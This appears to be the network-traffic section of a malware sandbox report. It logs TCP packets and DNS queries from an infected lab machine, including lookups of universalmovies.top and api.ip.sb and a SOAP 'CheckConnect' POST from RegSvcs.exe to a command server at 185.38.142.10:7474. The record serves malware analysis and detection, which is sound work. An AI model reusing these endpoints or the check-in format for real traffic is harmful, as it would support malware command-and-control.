                                          Jun 24, 2024 18:23:31.744421959 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:31.744450092 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:31.744450092 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:31.744477034 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:31.744487047 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:31.744505882 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:31.744539022 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:31.749659061 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:31.749689102 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:31.749716997 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:31.749744892 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:31.749761105 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:31.749772072 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:31.749793053 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:31.749823093 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:31.749847889 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:31.749912977 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:31.749933958 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:31.749978065 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:31.797359943 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:31.797481060 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:31.845207930 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:31.845314026 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:31.893467903 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:31.893542051 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:31.941098928 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:31.941179037 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:31.989113092 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:31.989213943 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.037103891 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.037308931 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.085158110 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.085242987 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.133241892 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.133327007 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.181399107 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.181484938 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.233122110 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.233247042 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.245613098 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.245795012 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.250912905 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.250929117 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.250941038 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.250952959 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.250958920 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.250972033 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.250994921 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251000881 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.251008034 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251022100 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251035929 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.251040936 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251053095 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251065016 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.251066923 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251079082 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251113892 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251116991 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.251137018 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.251144886 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251179934 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.251209974 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.251630068 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251642942 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251647949 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251660109 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251671076 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251682997 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251694918 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251708031 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251708031 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.251718998 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251730919 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251735926 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.251754999 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251770020 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251780987 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251781940 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.251792908 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251806021 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251817942 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.251830101 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.252433062 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.257366896 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.257379055 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.257384062 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.257389069 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.257392883 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.257400036 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.257405996 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.257417917 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.257428885 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.257441998 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.258327007 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.258733988 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.258913994 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.258927107 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.258939028 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.258953094 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.258965015 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.259042978 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.259056091 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.259067059 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.259170055 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.960233927 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.961637974 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.966532946 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:32.966852903 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.966852903 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:32.971653938 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.166858912 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.169193983 CEST747449178185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.169271946 CEST491787474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.322940111 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.327930927 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.328002930 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.328177929 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.328241110 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.333239079 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.333251953 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.333285093 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.333298922 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.333306074 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.333332062 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.333347082 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.338198900 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.338212967 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.338224888 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.338237047 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.338258982 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.338269949 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.338270903 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.338282108 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.338284016 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.338315010 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.338327885 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.338337898 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.338378906 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.338468075 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.338512897 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.343137980 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.343163013 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.343194008 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.343213081 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.385139942 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.385271072 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.403697014 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.403806925 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.408782959 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.408796072 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.408819914 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.408833027 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.408845901 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.408849955 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.408859015 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.408876896 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.408893108 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.408902884 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.408911943 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.408932924 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.408947945 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.408953905 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.408967972 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.408991098 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.409006119 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.409013987 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.409038067 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.409060955 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.409167051 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.409179926 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.409210920 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.409234047 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.409276962 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.409338951 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.410608053 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.410677910 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.413831949 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.413919926 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.413955927 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414004087 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.414083004 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414127111 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.414128065 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414140940 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414176941 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.414194107 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.414267063 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414319992 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.414432049 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414452076 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414479971 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.414504051 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.414536953 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414550066 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414573908 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414583921 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.414602995 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:33.414642096 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414655924 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414675951 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414768934 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414783001 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414803982 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414906025 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.414920092 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.415468931 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.415561914 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.418946028 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.419416904 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.419496059 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.419610023 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.419641972 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:33.419673920 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:35.614211082 CEST747449179185.38.142.10192.168.2.22
                                          Jun 24, 2024 18:23:35.658433914 CEST491797474192.168.2.22185.38.142.10
                                          Jun 24, 2024 18:23:35.658936024 CEST491787474192.168.2.22185.38.142.10
                                          TimestampSource PortDest PortSource IPDest IP
                                          Jun 24, 2024 18:22:55.070482969 CEST5291753192.168.2.228.8.8.8
                                          Jun 24, 2024 18:22:55.085390091 CEST53529178.8.8.8192.168.2.22
                                          Jun 24, 2024 18:22:59.371992111 CEST5482153192.168.2.228.8.8.8
                                          Jun 24, 2024 18:22:59.383816004 CEST53548218.8.8.8192.168.2.22
                                          Jun 24, 2024 18:22:59.390760899 CEST5471953192.168.2.228.8.8.8
                                          Jun 24, 2024 18:22:59.398675919 CEST53547198.8.8.8192.168.2.22
                                          Jun 24, 2024 18:23:05.933547974 CEST5278153192.168.2.228.8.8.8
                                          Jun 24, 2024 18:23:05.952411890 CEST53527818.8.8.8192.168.2.22
                                          Jun 24, 2024 18:23:05.953915119 CEST6392653192.168.2.228.8.8.8
                                          Jun 24, 2024 18:23:05.961061001 CEST53639268.8.8.8192.168.2.22
                                          Jun 24, 2024 18:23:07.258905888 CEST6551053192.168.2.228.8.8.8
                                          Jun 24, 2024 18:23:07.277204990 CEST53655108.8.8.8192.168.2.22
                                          Jun 24, 2024 18:23:07.284126997 CEST6267253192.168.2.228.8.8.8
                                          Jun 24, 2024 18:23:07.292412043 CEST53626728.8.8.8192.168.2.22
                                          Jun 24, 2024 18:23:08.806937933 CEST5647553192.168.2.228.8.8.8
                                          Jun 24, 2024 18:23:08.814817905 CEST53564758.8.8.8192.168.2.22
                                          Jun 24, 2024 18:23:08.818243027 CEST4938453192.168.2.228.8.8.8
                                          Jun 24, 2024 18:23:08.826379061 CEST53493848.8.8.8192.168.2.22
                                          Jun 24, 2024 18:23:11.929521084 CEST5484253192.168.2.228.8.8.8
                                          Jun 24, 2024 18:23:11.936785936 CEST53548428.8.8.8192.168.2.22
                                          Jun 24, 2024 18:23:15.000698090 CEST5810553192.168.2.228.8.8.8
                                          Jun 24, 2024 18:23:15.013371944 CEST53581058.8.8.8192.168.2.22
                                          Jun 24, 2024 18:23:15.018553972 CEST6492853192.168.2.228.8.8.8
                                          Jun 24, 2024 18:23:15.025304079 CEST53649288.8.8.8192.168.2.22
                                          Jun 24, 2024 18:23:16.586559057 CEST5739053192.168.2.228.8.8.8
                                          Jun 24, 2024 18:23:16.593208075 CEST53573908.8.8.8192.168.2.22
                                          Jun 24, 2024 18:23:16.594911098 CEST5809553192.168.2.228.8.8.8
                                          Jun 24, 2024 18:23:16.601613998 CEST53580958.8.8.8192.168.2.22
                                          Jun 24, 2024 18:23:24.591696978 CEST5426153192.168.2.228.8.8.8
                                          Jun 24, 2024 18:23:24.608532906 CEST6050753192.168.2.228.8.8.8
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jun 24, 2024 18:22:55.070482969 CEST192.168.2.228.8.8.80x9372Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:22:59.371992111 CEST192.168.2.228.8.8.80x7671Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:22:59.390760899 CEST192.168.2.228.8.8.80x322cStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:05.933547974 CEST192.168.2.228.8.8.80x2664Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:05.953915119 CEST192.168.2.228.8.8.80xb6ecStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:07.258905888 CEST192.168.2.228.8.8.80x9c5bStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:07.284126997 CEST192.168.2.228.8.8.80x4189Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:08.806937933 CEST192.168.2.228.8.8.80x2383Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:08.818243027 CEST192.168.2.228.8.8.80x99e0Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:11.929521084 CEST192.168.2.228.8.8.80x836eStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:15.000698090 CEST192.168.2.228.8.8.80x98abStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:15.018553972 CEST192.168.2.228.8.8.80xae0fStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:16.586559057 CEST192.168.2.228.8.8.80xd36dStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:16.594911098 CEST192.168.2.228.8.8.80x733bStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:24.591696978 CEST192.168.2.228.8.8.80x1678Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:24.608532906 CEST192.168.2.228.8.8.80x132cStandard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jun 24, 2024 18:22:55.085390091 CEST8.8.8.8192.168.2.220x9372No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:22:55.085390091 CEST8.8.8.8192.168.2.220x9372No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:22:59.383816004 CEST8.8.8.8192.168.2.220x7671No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:22:59.383816004 CEST8.8.8.8192.168.2.220x7671No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:22:59.398675919 CEST8.8.8.8192.168.2.220x322cNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:22:59.398675919 CEST8.8.8.8192.168.2.220x322cNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:05.952411890 CEST8.8.8.8192.168.2.220x2664No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:05.952411890 CEST8.8.8.8192.168.2.220x2664No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:05.961061001 CEST8.8.8.8192.168.2.220xb6ecNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:05.961061001 CEST8.8.8.8192.168.2.220xb6ecNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:07.277204990 CEST8.8.8.8192.168.2.220x9c5bNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:07.277204990 CEST8.8.8.8192.168.2.220x9c5bNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:07.292412043 CEST8.8.8.8192.168.2.220x4189No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:07.292412043 CEST8.8.8.8192.168.2.220x4189No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:08.814817905 CEST8.8.8.8192.168.2.220x2383No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:08.814817905 CEST8.8.8.8192.168.2.220x2383No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:08.826379061 CEST8.8.8.8192.168.2.220x99e0No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:08.826379061 CEST8.8.8.8192.168.2.220x99e0No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:11.936785936 CEST8.8.8.8192.168.2.220x836eNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:11.936785936 CEST8.8.8.8192.168.2.220x836eNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:15.013371944 CEST8.8.8.8192.168.2.220x98abNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:15.013371944 CEST8.8.8.8192.168.2.220x98abNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:15.025304079 CEST8.8.8.8192.168.2.220xae0fNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:15.025304079 CEST8.8.8.8192.168.2.220xae0fNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:16.593208075 CEST8.8.8.8192.168.2.220xd36dNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:16.593208075 CEST8.8.8.8192.168.2.220xd36dNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:16.601613998 CEST8.8.8.8192.168.2.220x733bNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:16.601613998 CEST8.8.8.8192.168.2.220x733bNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                          Jun 24, 2024 18:23:24.604656935 CEST8.8.8.8192.168.2.220x1678No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                          Jun 24, 2024 18:23:24.619441032 CEST8.8.8.8192.168.2.220x132cNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                          • universalmovies.top
                                          • 185.38.142.10:7474
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.2249176185.38.142.1074743536C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jun 24, 2024 18:23:18.092936993 CEST239OUTPOST / HTTP/1.1
                                          Content-Type: text/xml; charset=utf-8
                                          SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                          Host: 185.38.142.10:7474
                                          Content-Length: 137
                                          Expect: 100-continue
                                          Accept-Encoding: gzip, deflate
                                          Connection: Keep-Alive
                                          Jun 24, 2024 18:23:18.724826097 CEST359INHTTP/1.1 200 OK
                                          Content-Length: 212
                                          Content-Type: text/xml; charset=utf-8
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Mon, 24 Jun 2024 16:23:17 GMT
